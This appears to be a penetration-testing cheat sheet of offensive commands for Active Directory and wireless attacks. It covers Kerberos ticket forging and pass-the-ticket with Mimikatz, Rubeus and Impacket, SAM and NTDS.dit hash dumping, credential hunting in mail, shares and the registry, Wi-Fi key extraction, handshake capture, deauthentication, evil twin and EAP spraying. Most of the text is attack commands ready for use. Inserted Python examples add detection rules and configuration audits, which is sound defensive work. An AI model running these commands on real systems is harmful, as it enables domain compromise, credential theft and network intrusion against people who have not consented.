#Set the TGT from Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Harvest tickets from Windows (1)


Mimikatz
https://github.com/gentilkiwi/mimikatz

mimikatz # sekurlsa::tickets /export

Rubeus in PowerShell
https://github.com/GhostPack/Rubeus.git

.\Rubeus.exe dump

Inject Ticket via Windows (2)


Mimikatz

mimikatz # kerberos::ptt <ticket_kirbi_file>

Rubeus

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

PsExec

.\PsExec.exe -accepteula \\<remote_hostname> cmd

Silver Ticket

Request The TGT via Linux (1)


https://github.com/SecureAuthCorp/impacket.git
#Generate the TGS with NTLM via impacket

python ticketer.py -nthash <ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

#Generate the TGS with AES key via impacket

python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> -spn <service_spn> <user_name>

Set Ticket via Linux (2)

#Use the TGT with Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Request The TGT via Windows (1)


https://github.com/gentilkiwi/mimikatz
#Generate the TGS with NTLM via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<ntlm_hash> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

#Generate the TGS with AES key via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

OR

mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name> /service:<service_name> /target:<service_machine_hostname>

Set Ticket via Windows (2)


#Use the TGT with Mimikatz

mimikatz # kerberos::ptt <ticket_kirbi_file>

#Use the TGT with Rubeus

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

#Execute remote commands with psexec

.\PsExec.exe -accepteula \\<remote_hostname> cmd

Golden Ticket
Request The TGT via Linux (1)
https://github.com/SecureAuthCorp/impacket.git
#Generate the TGS with NTLM via impacket

python ticketer.py -nthash <krbtgt_ntlm_hash> -domain-sid <domain_sid> -domain <domain_name> <user_name>

#Generate the TGS with AES key via impacket

python ticketer.py -aesKey <aes_key> -domain-sid <domain_sid> -domain <domain_name> <user_name>

Set Ticket via Linux (2)


#Use the TGT with Impacket

export KRB5CCNAME=<TGS_ccache_file>

#Execute remote commands with psexec or smbexec or wmiexec

python psexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python smbexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

OR

python wmiexec.py <domain_name>/<user_name>@<remote_hostname> -k -no-pass

Request The TGT via Windows (1)

https://github.com/gentilkiwi/mimikatz
#Generate the TGS with NTLM via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>

#Generate the TGS with AES key via Mimikatz

mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>

OR

mimikatz # kerberos::golden /domain:<domain_name> /sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>

Set Ticket via Windows (2)


#Use the TGT with Mimikatz

mimikatz # kerberos::ptt <ticket_kirbi_file>

#Use the TGT with Rubeus

.\Rubeus.exe ptt /ticket:<ticket_kirbi_file>

#Execute remote commands with psexec

.\PsExec.exe -accepteula \\<remote_hostname> cmd

Automate Local Admin to Domain Admin (Noisy)
Initiate Deathstar
https://github.com/EmpireProject/Empire

python empire --rest --username empireadmin --password Password123

https://github.com/byt3bl33d3r/DeathStar

DeathStar.py

Execute DeathStar

crackmapexec smb targets.txt -u username -p password -d domain -M empire_exec -o LISTENER=DeathStar

CREDENTIAL PILLAGING

Extract SAM & Cached Hashes Manually

Manual Local SAM and Cached Credential Extraction (1)

reg save hklm\sam c:\SAM

reg save hklm\system c:\SYSTEM

reg save hklm\security c:\SECURITY

Reconstruct SAM and Cached Credentials into readable hashes (2)

impacket-secretsdump -sam /root/SAM -security /root/SECURITY -system /root/SYSTEM LOCAL

Extract NTDS.dit Hashes Manually

Manual NTDS.dit Extraction using vssadmin (1)

vssadmin create shadow /for=C:

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit c:\ntds.dit

copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\SYSTEM c:\SYSTEM

Manual NTDS.dit Extraction using ntdsutil (1)

ntdsutil "ac in ntds" i "cr fu c:\temp" q q

Reconstruct NTDS.dit into readable hashes (2)

impacket-secretsdump -ntds ./ntds.dit -system ./SYSTEM LOCAL -outputfile customer
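Every manual step in the two sections above leaves a process-creation record on the host (reg.exe saving a hive, vssadmin creating a shadow copy, a copy out of the shadow copy path, ntdsutil with its abbreviated "ifm"/"create full" verbs), which makes them cheap to alert on. The Python below is an added example, not part of the field guide; the records are constructed in the shape of Security 4688 / Sysmon Event 1 data, and the is_dc_account() helper is a placeholder you would replace with your real list of domain controllers. The DRSUAPI path used by crackmapexec --ntds drsuapi (next section) never spawns a process on the DC, so the block also carries a rule for a 4662 event granting DS-Replication-Get-Changes-All (GUID 1131f6ad-9c07-11d1-f79f-00c04fc2dcd2) to a non-DC principal.

```python
"""Flag process-creation and directory-audit records that match manual
SAM / NTDS.dit extraction. Added defensive example; SAMPLE_RECORDS are constructed."""
import re

# (rule name, regex over the command line), matched case-insensitively.
COMMAND_RULES = [
    ("reg_save_hive",
     re.compile(r"\breg(\.exe)?\s+save\s+hklm\\(sam|system|security)\b", re.I)),
    ("vssadmin_create_shadow",
     re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b", re.I)),
    ("copy_from_shadow_copy",
     re.compile(r"HarddiskVolumeShadowCopy\d+\\.*\\(ntds\.dit|system)\b", re.I)),
    # ntdsutil accepts abbreviated verbs, so accept 'ifm'/'i' and 'create full'/'cr fu'.
    ("ntdsutil_ifm",
     re.compile(r"\bntdsutil(\.exe)?\b.*\b(ifm|i|cr\w*\s+fu\w*|create\s+full)\b", re.I)),
]

# Control access right requested by a DCSync-style replication (event 4662).
DS_REPL_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"

# Constructed sample records (not real telemetry).
SAMPLE_RECORDS = [
    {"EventID": "4688", "Host": "WS07", "User": r"CORP\jdoe",
     "CommandLine": r"reg save hklm\sam c:\SAM"},
    {"EventID": "4688", "Host": "WS07", "User": r"CORP\jdoe",
     "CommandLine": r"reg  save hklm\system c:\SYSTEM"},
    {"EventID": "1", "Host": "DC01", "User": r"CORP\jdoe",
     "CommandLine": r"vssadmin create shadow /for=C:"},
    {"EventID": "1", "Host": "DC01", "User": r"CORP\jdoe",
     "CommandLine": r"cmd /c copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit c:\ntds.dit"},
    {"EventID": "1", "Host": "DC01", "User": r"CORP\jdoe",
     "CommandLine": r'ntdsutil "ac in ntds" i "cr fu c:\temp" q q'},
    {"EventID": "4688", "Host": "WS07", "User": r"CORP\jdoe",
     "CommandLine": r"reg query HKCU\Software\Microsoft\Windows /s"},   # benign
    {"EventID": "4662", "Host": "DC01", "User": r"CORP\jdoe",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": "4662", "Host": "DC01", "User": r"CORP\DC02$",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},             # DC replicating
]


def is_dc_account(user):
    """Placeholder: treat machine accounts as DCs. Use a real DC list in production."""
    return user.endswith("$")


def match_record(record):
    """Return the rule names a single record triggers."""
    hits = []
    if record.get("EventID") in ("4688", "1"):
        cmd = record.get("CommandLine", "")
        hits.extend(name for name, rx in COMMAND_RULES if rx.search(cmd))
    elif record.get("EventID") == "4662":
        props = record.get("Properties", "").lower()
        if DS_REPL_GET_CHANGES_ALL in props and not is_dc_account(record.get("User", "")):
            hits.append("dcsync_replication_right")
    return hits


def scan_records(records):
    """Return (rule, host, user, evidence) for every rule triggered by every record."""
    findings = []
    for rec in records:
        for rule in match_record(rec):
            evidence = rec.get("CommandLine") or rec.get("Properties", "")
            findings.append((rule, rec.get("Host"), rec.get("User"), evidence))
    return findings


if __name__ == "__main__":
    for finding in scan_records(SAMPLE_RECORDS):
        print(finding)
```

The ntdsutil rule deliberately matches the one-letter abbreviation so that the exact command quoted in the section above is caught; the price is the occasional false positive on other ntdsutil invocations, which is acceptable because ntdsutil itself is rare on a healthy DC.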

EXTRACT NTDS.DIT HASHES (AUTOMATED)

Dump NTDS.dit with Crackmapexec

crackmapexec smb <target> -u admin -p Password123 -d domain --ntds drsuapi

FIND PLAINTEXT PASSWORDS

Automate searching for credentials through email

https://github.com/dafthack/MailSniper

# Searching with non-admin privs

Invoke-SelfSearch -Mailbox [email protected]

# Searching with admin privs

Invoke-GlobalMailSearch -ImpersonationAccount notanadmin -ExchHostname exchange

Automate search through SMB and NFS shares

https://github.com/nikallass/sharesearch

python3 sharesearch.py -p all -w -v -H hosts.lst -C creds.lst

https://github.com/SpiderLabs/scavenger

python3 scavenger.py smb -t 10.0.0.10 -u administrator -p Password123 -d test.local

OR

python3 scavenger.py smb --target iplist --username administrator --password Password123 --domain test.local --overwrite

Extract session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP
https://github.com/Arvanaghi/SessionGopher

Import-Module path\to\SessionGopher.ps1; Invoke-SessionGopher -iL targets.txt -u domain.com\admin -p Password123 -o

Search passwords in commonly-used software

https://github.com/AlessandroZ/LaZagne/releases

Drop laZagne.exe on the host and run: laZagne.exe all

Metasploit Post Exploitation

use post/windows/gather/smart_hashdump

use post/windows/gather/credentials/domain_hashdump

use post/windows/gather/credentials/mcafee_vse_hashdump

use post/windows/gather/credentials/mssql_local_hashdump

use post/windows/gather/hashdump

use post/windows/gather/credentials/credential_collector

use post/windows/gather/enum_computers

use post/windows/gather/cachedump

use post/windows/gather/enum_ad_computers

use post/windows/gather/credentials/gpp

Search passwords in files and registry

findstr /si password *.txt

findstr /si password *.xml

dir /s *pass* == *cred* == *vnc* == *.config*

findstr /spin "password" *.*

reg query HKLM /f password /t REG_SZ /s

reg query HKCU /f password /t REG_SZ /s

findstr /si password *.ini

dir /b /s sysprep.inf

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" (Windows Autologin)

Crackmapexec

crackmapexec smb -t 150 <target> -u USER -p Password123 --spider Users --depth 10 --pattern password

Extract passwords from PST file

Non-password-protected PST file
https://github.com/srnsw/xena/tree/master/xena/dist/winx86

readpst.exe -D -S -o output -t ea mail.pst

findstr /s /i /m "password" *.*

Password-protected PST file

https://github.com/righettod/pst-digger

java -jar pst-digger.jar -a -f "C:\Users\xxx\my.pst" -i -k "login|password" -o TEST01

Stored Passwords in PowerShell History

cat (Get-PSReadlineOption).HistorySavePath

or

cat (Get-PSReadlineOption).HistorySavePath | sls password

or

cat (Get-PSReadlineOption).HistorySavePath | sls accountpassword
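The findstr, reg query, sysprep.inf and PSReadline checks above are also the checks a blue team should be running on its own estate before an assessor does. The Python below is an added example, not part of the field guide: it applies the same patterns (password=/pwd= assignments in config files, a Winlogon DefaultPassword value, ConvertTo-SecureString ... -AsPlainText in PowerShell history) and reports each hit with the secret redacted, so the output can be attached to a ticket without spreading the credential further. SAMPLE_FILES are constructed; scan_tree() is the entry point for a real directory.

```python
"""Scan files for plaintext credentials and report redacted hits.

Added defensive example; SAMPLE_FILES are constructed, not real data."""
import os
import re

# (rule, regex). Group 1 is the key/context, group 2 the secret that gets redacted.
CREDENTIAL_PATTERNS = [
    ("password_assignment",
     re.compile(r"(?i)(\w*(?:password|passwd|pwd))\s*[=:]\s*[\"']?([^\"'\s<>]+)")),
    ("winlogon_autologon",
     re.compile(r"(?i)\b(DefaultPassword)\s+REG_SZ\s+(\S+)")),
    ("powershell_plaintext",
     re.compile(r"(?i)(ConvertTo-SecureString)\s+[\"']([^\"']+)[\"']\s+-AsPlainText")),
]

SCAN_EXTENSIONS = (".txt", ".xml", ".ini", ".inf", ".config", ".ps1", ".conf")

# Constructed sample files keyed by path.
SAMPLE_FILES = {
    r"C:\inetpub\wwwroot\web.config":
        '<add name="db" connectionString="Server=sql01;User ID=app;Password=Summer2019!" />\n',
    r"C:\Windows\Panther\sysprep.inf":
        '[GuiUnattended]\nAdminPassword="Summer2019!"\nAutoLogon=Yes\n',
    r"C:\temp\winlogon_query.txt":
        "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\n"
        "    AutoAdminLogon    REG_SZ    1\n"
        "    DefaultPassword    REG_SZ    Summer2019!\n",
    r"C:\Users\jdoe\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt":
        '$p = ConvertTo-SecureString "Summer2019!" -AsPlainText -Force\n'
        "Set-ADAccountPassword svc_backup -NewPassword (ConvertTo-SecureString 'Winter2019!' -AsPlainText -Force)\n",
    r"C:\Users\jdoe\Desktop\notes.txt":
        "Remember to rotate the password monthly.\n",
}


def redact(value):
    """Keep first and last character so analysts can recognise a value without seeing it."""
    if len(value) <= 2:
        return "*" * len(value)
    return value[0] + "*" * (len(value) - 2) + value[-1]


def scan_text(path, text):
    """Return one finding per line that matches a credential pattern (first rule wins)."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx in CREDENTIAL_PATTERNS:
            m = rx.search(line)
            if m:
                findings.append({"path": path, "line": lineno, "rule": rule,
                                 "key": m.group(1), "value": redact(m.group(2))})
                break
    return findings


def scan_files(files):
    """Scan an in-memory {path: text} mapping (used for the constructed samples)."""
    findings = []
    for path, text in files.items():
        findings.extend(scan_text(path, text))
    return findings


def scan_tree(root, extensions=SCAN_EXTENSIONS):
    """Walk a real directory and scan files with the given extensions."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(extensions):
                path = os.path.join(dirpath, name)
                try:
                    with open(path, errors="ignore") as fh:
                        findings.extend(scan_text(path, fh.read()))
                except OSError:
                    continue
    return findings


if __name__ == "__main__":
    for f in scan_files(SAMPLE_FILES):
        print(f"{f['path']}:{f['line']} [{f['rule']}] {f['key']} = {f['value']}")
```

The note line in notes.txt shows why the assignment rule requires an "=" or ":" after the keyword: plain prose mentioning the word password is not a finding, which keeps the noise down compared with a bare findstr /si password.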

WPA PSK STRING EXTRACTION

Windows

netsh wlan show profiles

netsh wlan show profile name=WIFI_NAME key=clear

Look for the "Key Content" line; the cleartext password is shown there.

*NIX

sudo cat /etc/NetworkManager/system-connections/{SSID} | grep psk=

sudo grep psk= /etc/NetworkManager/system-connections/*

OR

sudo cat /etc/wicd/wireless-settings.conf
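The sudo in the *NIX commands above is the whole control: a NetworkManager profile that stores psk= on disk is protected only by its file mode and owner, so a profile that ends up group- or world-readable (or owned by a regular user) hands the PSK to anyone on the machine. The Python below is an added example, not part of the field guide: collect_profiles() reads the real directory (as root), audit_profile() applies the checks, and SAMPLE_PROFILES are constructed records. The psk-flags check relies on NetworkManager's secret-flags semantics, where 0 means the secret is stored in the file and any other value means an agent or keyring is expected to supply it.

```python
"""Audit NetworkManager connection profiles that keep a Wi-Fi PSK on disk.

Added defensive example; SAMPLE_PROFILES are constructed (path, mode, uid, text)."""
import os
import re
import stat

PSK_RE = re.compile(r"^\s*psk\s*=\s*(\S+)", re.M)
PSK_FLAGS_RE = re.compile(r"^\s*psk-flags\s*=\s*(\d+)", re.M)

SAMPLE_PROFILES = [
    ("corp.nmconnection", 0o600, 0,
     "[wifi-security]\nkey-mgmt=wpa-psk\npsk=CorrectHorseBatteryStaple\n"),
    ("guest.nmconnection", 0o644, 0,
     "[wifi-security]\nkey-mgmt=wpa-psk\npsk=GuestNetwork2019\n"),
    ("lab.nmconnection", 0o600, 1000,
     "[wifi-security]\nkey-mgmt=wpa-psk\npsk=LabOnly\n"),
    ("home.nmconnection", 0o644, 0,
     "[wifi-security]\nkey-mgmt=wpa-psk\npsk-flags=1\n"),   # key lives in a keyring
    ("eap.nmconnection", 0o644, 0,
     "[802-1x]\neap=peap;\nidentity=alice\n"),              # no PSK at all
]


def collect_profiles(root="/etc/NetworkManager/system-connections"):
    """Yield (path, mode, uid, text) for every regular file under root (needs root)."""
    for name in sorted(os.listdir(root)):
        path = os.path.join(root, name)
        st = os.stat(path)
        if not stat.S_ISREG(st.st_mode):
            continue
        with open(path, errors="ignore") as fh:
            yield path, stat.S_IMODE(st.st_mode), st.st_uid, fh.read()


def audit_profile(mode, uid, text):
    """Return a list of issue strings for one profile (empty when it is fine)."""
    issues = []
    if PSK_RE.search(text) is None:
        return issues                      # nothing secret on disk, nothing to protect
    if mode & (stat.S_IRGRP | stat.S_IROTH):
        issues.append("psk on disk in a file readable by group/other (mode %o)" % mode)
    if uid != 0:
        issues.append("psk on disk in a file not owned by root (uid %d)" % uid)
    flags = PSK_FLAGS_RE.search(text)
    if flags and flags.group(1) != "0":
        # A non-zero psk-flags means the key should come from an agent/keyring,
        # yet a copy is still sitting in the file.
        issues.append("psk on disk although psk-flags=%s says it is agent-owned" % flags.group(1))
    return issues


def audit_profiles(records):
    """Map path -> issues for every record that has at least one issue."""
    findings = {}
    for path, mode, uid, text in records:
        issues = audit_profile(mode, uid, text)
        if issues:
            findings[path] = issues
    return findings


if __name__ == "__main__":
    for path, issues in audit_profiles(SAMPLE_PROFILES).items():
        print(path, "->", "; ".join(issues))
```

Run it on a real host as audit_profiles(collect_profiles()); the default NetworkManager installation writes these files as root with mode 600, so anything the audit reports is a deviation worth explaining.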

WIRELESS

WPA/WPA2 HASH CAPTURE WITH USERS
# Will work with a cheap Atheros wireless USB LAN adapter
Automate
https://github.com/derv82/wifite2
https://github.com/v1s1t0r1sh3r3/airgeddon

./Wifite.py

OR

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Handshake tools menu (option 5)
4) Explore targets (option 4)
5) Capture Handshake (option 5)

Run manually

airmon-ng

airmon-ng start wlan0

airodump-ng wlan0mon

OR

airodump-ng -b a wlan0mon

airodump-ng wlan0mon -c 3 -t wpa -d ff:ff:ff:ff:ff:ff -w capture

# -c = channel, -d = BSSID

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 wlan0mon

# -a = BSSID, -c = client

WPA/WPA2 HASH CAPTURE WITHOUT USERS (PMKID)

# Will work with a cheap Atheros wireless USB LAN adapter
Automate via Wifite
https://github.com/derv82/wifite2

./Wifite.py

Run manually
https://github.com/ZerBea/hcxdumptool
https://github.com/ZerBea/hcxtools

airmon-ng

airmon-ng start wlan0

airodump-ng --ivs wlan0mon

echo "BSSID">filter.txt

hcxdumptool -o cap01.pcapng -i wlan0 --filterlist=filter.txt --filtermode=2 --enable_status=1 -c 1

hcxpcaptool -E essidlist -I identitylist -U usernamelist -z cap01.16800 cap01.pcapng

WPS
# Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
https://github.com/v1s1t0r1sh3r3/airgeddon

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select WPS attack menu (option 8)
4) Explore targets (option 4)
5) Run through list (7-13)

ENTERPRISE WIRELESS
# Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
https://github.com/v1s1t0r1sh3r3/airgeddon

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Enterprise attack menu (option 10)

4) Create company specific certificate (option 5)
5) Select Smooth mode Enterprise Evil Twin (option 6)

Password Spray
https://github.com/s0lst1c3/eaphammer

./eaphammer --eap-spray -i wlan0 -e SSID_EXAMPLE --user-list users.txt --password Summer2019

Password Reuse

If certificates are not validated, use a compromised AD username and password.
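The password reuse note above describes the client-side weakness that both the enterprise evil twin and EAP spray depend on: a supplicant that does not pin the RADIUS server's CA and name will complete the inner MSCHAPv2 exchange with whoever answers. The Python below is an added example, not part of the field guide: it parses wpa_supplicant.conf network blocks and reports WPA-EAP profiles that lack ca_cert/ca_path or any server-name match (domain_suffix_match, domain_match, subject_match, altsubject_match). SAMPLE_CONF is constructed; parse_networks() accepts the text of a real configuration file.

```python
"""Audit wpa_supplicant.conf for WPA-Enterprise profiles that skip server validation.

Added defensive example; SAMPLE_CONF is a constructed configuration."""
import re

SAMPLE_CONF = '''
ctrl_interface=/run/wpa_supplicant

network={
    ssid="corp-wifi"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice@corp.local"
    password="hash:0123456789abcdef0123456789abcdef"
    ca_cert="/etc/ssl/certs/corp-radius-ca.pem"
    domain_suffix_match="radius.corp.local"
    phase2="auth=MSCHAPV2"
}

network={
    ssid="corp-wifi-legacy"
    key_mgmt=WPA-EAP
    eap=PEAP
    identity="alice@corp.local"
    password="Summer2019!"
    phase2="auth=MSCHAPV2"
}

network={
    ssid="home"
    key_mgmt=WPA-PSK
    psk="CorrectHorseBatteryStaple"
}
'''

NAME_MATCH_KEYS = ("domain_suffix_match", "domain_match", "subject_match", "altsubject_match")
TLS_BASED_EAP = ("PEAP", "TTLS", "TLS")


def parse_networks(text):
    """Return one dict per network={...} block with quotes stripped from values."""
    networks, current = [], None
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()      # drop comments and whitespace
        if not line:
            continue
        if line.startswith("network={"):
            current = {}
        elif line == "}" and current is not None:
            networks.append(current)
            current = None
        elif current is not None and "=" in line:
            key, value = line.split("=", 1)
            current[key.strip()] = value.strip().strip('"')
    return networks


def audit_enterprise(net):
    """Issues for one network; empty for PSK networks and well-configured EAP ones."""
    issues = []
    if "WPA-EAP" not in net.get("key_mgmt", "").upper():
        return issues
    if net.get("eap", "").upper() not in TLS_BASED_EAP:
        return issues
    if not (net.get("ca_cert") or net.get("ca_path")):
        issues.append("no ca_cert/ca_path: any server certificate is accepted")
    if not any(net.get(k) for k in NAME_MATCH_KEYS):
        issues.append("no server name match: any certificate from the CA is accepted")
    return issues


def audit_config(text):
    """Map ssid -> issues for every enterprise network with a validation gap."""
    findings = {}
    for net in parse_networks(text):
        issues = audit_enterprise(net)
        if issues:
            findings[net.get("ssid", "?")] = issues
    return findings


if __name__ == "__main__":
    for ssid, issues in audit_config(SAMPLE_CONF).items():
        print(ssid, "->", "; ".join(issues))
```

Both checks are needed together: a CA pin alone still accepts any certificate that CA issued, and a name match alone is meaningless if the CA is not pinned. The corp-wifi profile in the sample passes because it sets both.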

EVIL TWIN (SOCIAL ENGINEERING)

# Will work with a cheap Atheros wireless USB LAN adapter
Automate via airgeddon
https://github.com/v1s1t0r1sh3r3/airgeddon

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Evil Twin menu (option 7)
4) Select option 7-9 based on OPSEC requirement

OPEN WIRELESS
Nmap internal IP addresses and/or hostnames.

WEP WIRELESS
# Will work with a cheap Atheros wireless USB LAN adapter
Automate
https://github.com/derv82/wifite2
https://github.com/v1s1t0r1sh3r3/airgeddon

./Wifite.py

OR

./airgeddon.sh

1) Select wlan0
2) Put interface in monitor mode (option 2)
3) Select Handshake tools menu (option 5)
4) Explore targets (option 4)
5) WEP attack (option 5)

Thank You for Your Contribution
- @Derek_Carlin
- @_dirkjan
- @byt3bl33d3r
- Rjohnsondev
- @netbiosX
- AlessandroZ
- @arvanaghi
- Nikallass
- @agsolino
- @PythonResponder
- @gentilkiwi
- @harmj0y
- @mysmartlogon
- Atom
- @xerosecurity
- @ztgrace
- Folks at SySS Research
- Contributors to Metasploit
- @bonsaiviking
- @ErrataRob
- x90skysn3k
- @DanHMcInerney
- @derv82
- @s0lst1c3